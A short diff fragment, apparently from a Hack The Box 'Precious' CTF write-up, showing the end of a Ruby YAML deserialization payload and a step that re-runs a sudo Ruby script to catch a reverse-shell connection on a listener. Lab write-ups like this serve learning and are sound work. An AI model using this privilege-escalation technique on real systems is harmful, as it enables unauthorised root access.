CSpanias/cspanias.github.io/_posts/2024-01-20-HTB - Precious.md

          method_id: :resolve
 ```

-Next, we need to open a listener:
+If we re-run the command now, `henry@precious:/tmp$ sudo /usr/bin/ruby /opt/update_dependencies.rb`, we should see a connection back to our listener:

 ```bash
 ---------- [ SETUP LISTENER ] ----------